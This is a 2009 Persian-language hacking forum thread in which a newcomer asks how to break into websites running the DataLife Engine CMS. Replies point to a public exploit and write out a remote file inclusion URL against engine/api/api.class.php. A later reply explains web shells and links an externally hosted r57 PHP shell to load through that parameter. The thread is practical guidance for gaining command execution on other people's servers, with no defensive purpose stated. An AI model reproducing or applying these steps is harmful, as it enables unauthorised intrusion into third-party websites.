Train

بازگشت   انجمن گروه آشیانه - آموزش هک و امنیت > فعالترین انجمن ها > سوال و جواب های عمومی

به راحتی یکی از اعضای انجمن تخصصی هک و امنیت شوید!
به انجمن تخصصی هک و امنیت گروه آشیانه خوش آمدید - شما می توانید در کمتر از 1 دقیقه به صورت رایگان به عضویت انجمن در بیایید و از تمام امکانات آن استفاده کنید.

نام کاربری: پسورد: تکرار پسورد: ایمیل: تکرار ایمیل:

تصویر تائید کننده
  موافقم با قوانین انجمن 

آخرین پست های انجمن

موضوع بسته شد

ابزارهای موضوع رتبه تاپیک نحوه نمایش
قدیمی 09-06-2009, 07:34 PM   #1
hamidreza2155

No Avatar

View hamidreza2155's Profile   View hamidreza2155's Photo Album   Add hamidreza2155's to Your Contacts   View Social Groups

Exclamation هک سایت هایی با سیستم مدیریت محتوای دیتالایف

می خواستم ببینم سایت هایی با سیستم مدیریت محتوای دیتالایف رو چجوری میشه هک کرد ؟
آدرس های ورودیش هم login.php , .. است .
hamidreza2155 آنلاین نیست.  
تبلیغات
قدیمی 09-06-2009, 08:03 PM   #2
0261

No Avatar

View 0261's Profile   View 0261's Photo Album   Add 0261's to Your Contacts   View Social Groups

0261 به Yahoo ارسال پیام
نقل قول:
نوشته اصلی توسط hamidreza2155 نمایش پست ها
می خواستم ببینم سایت هایی با سیستم مدیریت محتوای دیتالایف رو چجوری میشه هک کرد ؟
آدرس های ورودیش هم login.php , .. است .
http://www.milw0rm.com/exploits/9572
0261 آنلاین نیست.  
از 0261 به خاطر این پست تشکر کرده اند :
punisher_jmi (09-07-2009)
قدیمی 09-06-2009, 08:28 PM   #3
hamidreza2155

No Avatar

View hamidreza2155's Profile   View hamidreza2155's Photo Album   Add hamidreza2155's to Your Contacts   View Social Groups

نفهمیدم

نقل قول:
نوشته اصلی توسط 0261 نمایش پست ها
مهندس من که نفهمدیم این چیه و چه جوری باید باهاش کار کرد . اگه میشه بیشتر کمک کنید
قدیمی 09-06-2009, 10:01 PM   #4
Encoder

Encoder آواتار ها

View Encoder's Profile   View Encoder's Photo Album   Add Encoder's to Your Contacts   View Social Groups

Encoder به Yahoo ارسال پیام
نقل قول:
نوشته اصلی توسط 0261 نمایش پست ها
سلام مرتضی جان . من چون خودم دیتالایف کار هستم و دارم یه دیتالایف رو ادیت می کنم و یه ورژن جدید میدم خیلی روی دیتالایف حساسم !

این باگ روی دیتالایف جواب نمیده : http://www.milw0rm.com/exploits/9572

البته روی سروری که سایت من هست Safe Mode = ON و Func = Disable و include هم بسته ام ! شاید دلیل اینکه جواب نمیده اینه ! ولی روی 18 تا سایت تست کردم و جواب نداد . می تونی مشکل رو بگی عزیز ؟

ممنونم
Encoder آنلاین نیست.  
قدیمی 09-06-2009, 11:56 PM   #5
System.Fehler

No Avatar

View System.Fehler's Profile   View System.Fehler's Photo Album   Add System.Fehler's to Your Contacts   View Social Groups

دلیل جواب ندادنش همون Fun ها هست
باگ Rfiیه

قدیمی 09-07-2009, 12:02 AM   #6
WAHID

WAHID آواتار ها

View WAHID's Profile   View WAHID's Photo Album   Add WAHID's to Your Contacts   View Social Groups

WAHID به Yahoo ارسال پیام
نقل قول:
مهندس من که نفهمدیم این چیه و چه جوری باید باهاش کار کرد . اگه میشه بیشتر کمک کنید
مهندس اگه متوجه نشدي پس بي خيال شو!
هلو رو داده بلد نيستي بخوري درست صحبت كن!

WAHID آنلاین نیست.  
تبلیغات
قدیمی 09-07-2009, 01:32 AM   #7
hamidreza2155

No Avatar

Question اسم انجمن چیه ؟

نقل قول:
نوشته اصلی توسط v4hid نمایش پست ها
مهندس اگه متوجه نشدي پس بي خيال شو!
هلو رو داده بلد نيستي بخوري درست صحبت كن!
اگر دقت کنی می فهمی که تو اسم انجمن کلمه " تازه وارد " وجود دارد . خوب منم همین امروز عضو شدم . خوب باید یک چیز طبیعی باشه که نتونم هلو رو بخورم . از دوستان خواهشمندم هلو رو پوست کنده و هسته آن را جدا کرده و آن را به چند تیکه تقسیم کنند سپس خوردن آن را هم آموزش دهند . منظورم اینه که خوب همه ما یک روز تازه وارد بودیم . اگر کسی درک می کنه کمک کنه از این باگ چجوری استفاده کنم .
قدیمی 09-07-2009, 01:44 AM   #8
WAHID

WAHID آواتار ها

View WAHID's Profile   View WAHID's Photo Album   Add WAHID's to Your Contacts   View Social Groups

نقل قول:
اگر دقت کنی می فهمی که تو اسم انجمن کلمه " تازه وارد " وجود دارد . خوب منم همین امروز عضو شدم . خوب باید یک چیز طبیعی باشه که نتونم هلو رو بخورم . از دوستان خواهشمندم هلو رو پوست کنده و هسته آن را جدا کرده و آن را به چند تیکه تقسیم کنند سپس خوردن آن را هم آموزش دهند . منظورم اینه که خوب همه ما یک روز تازه وارد بودیم . اگر کسی درک می کنه کمک کنه از این باگ چجوری استفاده کنم .

خوب ما هم اينجاييم تا اين چيز هاي طبيعي رو براي شما توضيح بديم! اما شما نحوه ي مطرح كردن سوالت درست نبود. بابت تند صحبت كردن هم عذر مي خوام!

اين لينكي كه آقا 0261 دادن لينك يه اكسپوليت بود براي ديتا لايف!
نحوه ي استفادش هم اين طوريه:

کد:
www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]

يعني به جاي site اسم سايت مورد نظر و در آخر آدرس به جاي [shell.txt?] آدرس شلرت رو كه يه جايي آپلود كردي مينويسي! بعد اجرا به اميد خدا شلر اجرا شده و دسترسي مورد نظر حاصل ميشه! البته اون جوري كه دوستان گفتن مثله اينكه ديگه وقتش گذشته!

موفق باشيد!

WAHID آنلاین نیست.  
قدیمی 09-07-2009, 01:52 AM   #9
Ali_Eagle

Ali_Eagle آواتار ها

View Ali_Eagle's Profile   View Ali_Eagle's Photo Album   Add Ali_Eagle's to Your Contacts   View Social Groups

Ali_Eagle به Yahoo ارسال پیام
نقل قول:
اگر هلو رو پوست کنده و هسته آن را جدا کرده و آن را به چند تیکه تقسیم کنند سپس خوردن آن را هم آموزش دهیم اون موقعه به گلوتون گیر می کنه !

احساس نمی کنید خودتون هم باید تلاش کنید . شما فقط بشینی پشت سیستمت همه همه کار رو بکنن نمیشه ...

هیچ حسی بالاتر از حس یک بازی تک نفره نیست ;

Боли я не могу забором пруд жить с болью думаю о том, что морская рыба не произошло в умах

Ali_Eagle هم اکنون آنلاین است.  
قدیمی 09-07-2009, 01:52 AM   #10
hamidreza2155

No Avatar

Cool

نقل قول:
نوشته اصلی توسط v4hid نمایش پست ها
خوب ما هم اينجاييم تا اين چيز هاي طبيعي رو براي شما توضيح بديم! اما شما نحوه ي مطرح كردن سوالت درست نبود. بابت تند صحبت كردن هم عذر مي خوام!

اين لينكي كه آقا 0261 دادن لينك يه اكسپوليت بود براي ديتا لايف!
نحوه ي استفادش هم اين طوريه:

کد:
www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]

يعني به جاي site اسم سايت مورد نظر و در آخر آدرس به جاي [shell.txt?] آدرس شلرت رو كه يه جايي آپلود كردي مينويسي! بعد اجرا به اميد خدا شلر اجرا شده و دسترسي مورد نظر حاصل ميشه! البته اون جوري كه دوستان گفتن مثله اينكه ديگه وقتش گذشته!

موفق باشيد!
عزیز من باید عذر خواهی کنم . با تشکر از آموزی مفیدتون . فقط هر جواب یک سوا جدید مطرح می کنه . می دونم خنده داره ولی شلر چیه ؟ چجوری باید ساخت ؟

با تشکر
قدیمی 09-07-2009, 02:12 AM   #11
WAHID

WAHID آواتار ها

نقل قول:
عزیز من باید عذر خواهی کنم . با تشکر از آموزی مفیدتون . فقط هر جواب یک سوا جدید مطرح می کنه . می دونم خنده داره ولی شلر چیه ؟ چجوری باید ساخت ؟

با تشکر
نتيجه ميگيريم اون اشتباهي به دست شما رسيد! شما بايد از آلبالو يا از اين گيلاس كوچيكا استفاده بفرماييد!
اينجا هم باغ آلبالو هست!

WAHID آنلاین نیست.  
قدیمی 09-07-2009, 02:17 AM   #12
Ruby

No Avatar

View Ruby's Profile   View Ruby's Photo Album   Add Ruby's to Your Contacts   View Social Groups

Ruby به Yahoo ارسال پیام
Smile

نقل قول:

با تشکر
سلام دوسته عزیز

بله این طبیعی است که هر جواب سوال جدید ایجاد میکنه و شما هم یک تازه وارد هسید

چن راه حل :

1 : راه آقای Ali_Eagle رو برید ممکنه سوالات شما رو خسته کنه نتونی هلو رو بخوری

راه حل این کار هم قبل هر پستی در موردش یه جستجو در سایتهای زیر کنی ( انشاالله بلدی دیگه یا فیلم بزاریم )

www.ashiyane.org
www.google.com
www.yahoo.com

بعد اگر در مورد سوالت جواب مورد نظر رو نگرفتی میتونی پست بدی

برای جواب شلر هم شما میتونی به سایت شماره 1 www.ashiyane.org مراجعه کنید و در قسمت سمت راست بالا جستجو رد بزنید و عبارت "آموزش شل " رو تاپیپ کنید و ببیندید در مورد آن بحث ها و آموزش های زیادی شده است

اینم از تکه کردن هلو از من بود بقیش هم از شماست

یا حق موفق باشید

ویرایش توسط Ruby : 09-07-2009 در ساعت 02:21 AM
Ruby آنلاین نیست.  
تبلیغات
قدیمی 09-07-2009, 02:19 AM   #13
MagicCoder

No Avatar

View MagicCoder's Profile   View MagicCoder's Photo Album   Add MagicCoder's to Your Contacts   View Social Groups

نقل قول:

با تشکر
شلر چی هست؟
شلر یک فایلی هست که پس از آپلود کردن فایل در سیستم میتوانید دستورات کنسول را اجرا کنید.
حالا ممکنه این شلر با روبی نوشته بشه با سی نوشته بشه با پی اچ پی نوشته بشه با همه زبان ها نسبتا میوان شلر را نوشت .
این هم یک شلر پی اچ پی است.
http://magiccoder.persiangig.com/Shell/r57.txt
شما تنها کاری که کافی است بکنید این آدرس را در محل [shell.txt?] قرار دخید و ادامه آن یک علامت ؟ قرار دهید.

موفق باشید.
MagicCoder آنلاین نیست.  
قدیمی 09-07-2009, 03:02 AM   #14
hamidreza2155

No Avatar

دست همه درد نکنه

نقل قول:
نوشته اصلی توسط sql_injection نمایش پست ها
سلام دوسته عزیز

بله این طبیعی است که هر جواب سوال جدید ایجاد میکنه و شما هم یک تازه وارد هسید

چن راه حل :

1 : راه آقای ali_eagle رو برید ممکنه سوالات شما رو خسته کنه نتونی هلو رو بخوری

راه حل این کار هم قبل هر پستی در موردش یه جستجو در سایتهای زیر کنی ( انشاالله بلدی دیگه یا فیلم بزاریم )

www.ashiyane.org
www.google.com
www.yahoo.com
دستت درد نکنه . ولی من اینو نفهمیدم" قبل از هر پستی ... "
. دست اون کسی که شلر داد هم درد نکنه ولی این کارو که می کنم سایت طرف رو میاره که می گه این صفحه وجود ندارد .
قدیمی 09-07-2009, 03:05 AM   #15
hamidreza2155

No Avatar

Lightbulb هلو گیر نمی کنه

نقل قول:
نوشته اصلی توسط ali_eagle نمایش پست ها
اگر هلو رو پوست کنده و هسته آن را جدا کرده و آن را به چند تیکه تقسیم کنند سپس خوردن آن را هم آموزش دهیم اون موقعه به گلوتون گیر می کنه !

احساس نمی کنید خودتون هم باید تلاش کنید . شما فقط بشینی پشت سیستمت همه همه کار رو بکنن نمیشه ...
اینو باید دونست که هلو موقعی در گلو گیر می کند که آن را در دهان بگذارید . اگر طرف یاد بگیره بعد بخوره 10 درصد ممکنه که در گلو گیر کنه . میشه بگید باید چجوری تلاش ( هلو رو تکه تکه ) کرد ؟
موضوع بسته شد

ابزارهای موضوع
نحوه نمایش امتیاز به این موضوع
امتیاز به این موضوع: